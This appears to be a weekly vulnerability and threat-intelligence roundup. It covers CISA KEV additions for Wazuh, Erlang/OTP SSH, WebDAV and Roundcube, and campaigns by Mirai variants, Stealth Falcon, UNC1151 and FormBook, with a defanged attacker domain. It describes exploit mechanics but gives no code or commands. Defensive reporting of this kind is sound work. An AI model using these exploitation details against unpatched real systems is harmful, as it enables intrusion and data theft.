Enterprise systems remain in the crosshairs as zero-day and critical flaws surface in widely deployed technologies. This week, CISA expanded its Known Exploited Vulnerabilities (KEV) catalog with four actively exploited flaws affecting Wazuh Server, Erlang/OTP SSH Server, Microsoft’s WebDAV component, and Roundcube Webmail.

Botnet activity witnessed a notable uptick as threat actors escalated exploitation campaigns using malware families such as EnemyBot, Sysrv-K, Andoryu, and Androxgh0st. These variants focused on abusing known vulnerabilities in widely used platforms like Cloud Gateway, GitLab, and multiple PHP-based services. Simultaneously, IoT-centric threats, including Bashlite, BrickerBot, Tsunami, and Mirai intensified attacks against Eir D1000 modems, rapidly compromising exposed devices and expanding their footprint across internet-connected infrastructure.  

This week witnessed a significant escalation in cyber threat activity, with threat actors aggressively targeting both critical infrastructure and legacy systems. Akamai reported that the Mirai botnet is actively exploiting a critical flaw in Wazuh Server, while CERT Polska attributed the ongoing abuse of a year-old Roundcube Webmail vulnerability to the UNC1151 threat group. Check Point Research uncovered a targeted cyberattack on a Turkish defense organization by Stealth Falcon, exploiting a vulnerability in Microsoft’s WebDAV component. Simultaneously, Kaspersky observed a surge in attacks on TBK DVR-4104 and DVR-4216 devices, expanding botnet reach, and FortiGuard Labs flagged a phishing campaign exploiting outdated Microsoft Office flaws to distribute FormBook malware.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-24016
A Deserialization of Untrusted Data Vulnerability in Wazuh Server allows unauthenticated remote code execution. With a critical CVSS Score of 9.9, this flaw affects versions 4.4.0 through 4.9.0 and has been addressed in version 4.9.1. Akamai's Security Intelligence and Response Team (SIRT) detected active exploitation attempts targeting this vulnerability just weeks after its public disclosure in February 2025.  It has since been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, signaling urgent action is required.

CVE-2025-32433
A Missing Authentication for a Critical Function Vulnerability in the Erlang/OTP SSH Server, assigned a CVSS Score of 10.0 (critical), affects versions prior to OTP 27.3.3, OTP 26.2.5.11, and OTP 25.3.2.20. This flaw arises from improper authentication checks in a critical SSH function, allowing a remote unauthenticated attacker to send crafted SSH_MSG_CHANNEL_OPEN and SSH_MSG_CHANNEL_REQUEST messages to execute arbitrary commands or cause a denial-of-service. Erlang has released security patches addressing this vulnerability in the aforementioned versions. With multiple proof-of-concept exploits publicly available and active exploitation confirmed, this vulnerability has also been added to CISA KEV catalog, urging immediate patching by affected organizations.

CVE-2025-33053
An External Control of File Name or Path Vulnerability in Web Distributed Authoring and Versioning (WebDAV) allows unauthorized remote code execution over a network. Initially exploited as zero-day, this flaw was discovered by Check Point Research and has since been addressed by Microsoft through a security update. By leveraging this flaw, the attackers could execute malicious files hosted on a WebDAV server, marking a novel technique in executable-based exploitation. Due to its active exploitation, this vulnerability has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog.

CVE-2024-42009
A Cross-Site Scripting (XSS) Vulnerability in Roundcube Webmail, rated critical with a CVSS Score of 9.3, affects versions 1.5.7 and below as well as 1.6.7 and below. This flaw, discovered by Sonar in 2024, originates from a desanitization issue in the message_body() function within  program/actions/mail/show.php, allowing attackers to embed malicious scripts in crafted email messages. Once a victim views the email, the attacker can steal or send emails from the victim's account without any further interaction. Roundcube addressed this issue by releasing patched versions 1.5.8 and 1.6.8 in 2024. According to CERT Polska, this vulnerability has been actively exploited in the wild recently, prompting its inclusion in the CISA KEV catalog.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

CVE-2025-24016
Akamai observed that beginning in early March 2025, multiple variants of the Mirai botnet began exploiting CVE-2025-24016 to deploy malicious shell scripts that act as downloaders for Mirai-based payloads. Among the samples identified were “morte,” part of the LZRD Mirai family known for targeting various IoT architectures.  

In a separate campaign detected in May, another Mirai variant named “resgod” emerged. This operation stood out due to its use of Italian-language domain names such as “gestisciweb[.]com” (“manage web”), indicating a possible focus on Italian-speaking networks or infrastructure.  Both campaigns exhibited capabilities beyond simply leveraging the Wazuh vulnerability, suggesting well-coordinated exploitation strategies. Notably, Akamai’s findings represent the first confirmed cases of CVE-2025-24016 being used in active attacks, emphasizing the critical need for organizations to evaluate their risk posture and apply patches without delay.

CVE-2025-33053
In March 2025, Check Point Research uncovered an attempted cyber attack aimed at a Turkish defense entity. The attackers exploited CVE-2025-33053, a vulnerability that enables manipulation of the working directory in trusted Windows tools like iediagcmd.exe. This flaw was used to execute malicious binaries hosted on an adversary-controlled WebDAV server, representing a novel method in the realm of executable based exploitation.  

This campaign has been attributed to Stealth Falcon, also known as FruityArmor, a sophisticated APT group active since 2012. Historically focused on government and defense organizations across the Middle East and North Africa, including Turkey, Egypt, Qatar, and Yemen, the group leveraged this vulnerability as a zero-day to execute malware directly from a WebDAV server, showcasing its continued evolution in attack tactics.    

CVE-2024-3721
Kaspersky researchers have identified a new surge of cyberattacks exploiting CVE-2024-3721 to distribute an updated version of the infamous Mirai botnet. This latest campaign specifically targets vulnerable DVR-based surveillance systems, expanding Mirai's focus beyond traditional IoT devices. Kaspersky's telemetry indicated that the highest concentration of infected systems is found in countries such as China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. What makes this wave particularly concerning is the vast number of exposed devices. Over 50,000 publicly accessible DVR units were identified through internet-wide scans. This broad attack surface significantly increases the potential scale of the botnet, raising serious security implications for both consumer and enterprise surveillance infrastructure worldwide.

CVE-2024-42009
CERT Polska has attributed the active exploitation of this vulnerability in Roundcube Webmail to UNC1151, a threat group associated with Belarusian state-sponsored operations and potentially linked to Russian intelligence services. This marks the first documented instance of UNC1151 leveraging this specific flaw. The vulnerability allows unauthenticated attackers to steal sensitive information such as emails and contact lists, send messages from compromised accounts, and maintain persistent access in the victim's browser, even after restarts, enabling prolonged email exfiltration and credential theft. Exploitation requires no user interaction beyond simply viewing a maliciously crafted email, significantly raising the risk of compromise. The group's campaign utilized tailored spear-phishing emails with urgent subject lines like “[!IMPORTANT] Invoice to reservation number: S2500650676,” crafted to impersonate legitimate travel-related business correspondence. These lures were specifically aimed at Polish organizations, enhancing the credibility of the bait and the likelihood of successful exploitation.

CVE-2017-0199
FortiGuard Labs has recently identified a high-severity phishing campaign aimed at users of outdated Microsoft Office applications. This operation leveraged a malicious Excel attachment to exploit CVE-2017-0199, a long-standing vulnerability in Microsoft Office's Object Linking and Embedding (OLE) feature. The campaign delivers the FormBook malware, a well-known information stealer capable of harvesting sensitive user data such as login credentials, keystrokes, and clipboard contents. When unsuspecting victims open the compromised Excel file, a chain of actions is triggered, ultimately leading to the execution of the FormBook payload. This campaign underscores the ongoing risks posed by unpatched legacy software in enterprise environments.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/06/10/cisa-adds-two-known-exploited-vulnerabilities-catalog  
2. https://www.cisa.gov/news-events/alerts/2025/06/09/cisa-adds-two-known-exploited-vulnerabilities-catalog
3. https://www.akamai.com/blog/security-research/botnets-flaw-mirai-spreads-through-wazuh-vulnerability  
4. https://research.checkpoint.com/2025/stealth-falcon-zero-day/  
5. https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/  
6. https://www.fortinet.com/blog/threat-research/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload  
7. https://cert.pl/en/posts/2025/06/unc1151-campaign-roundcube/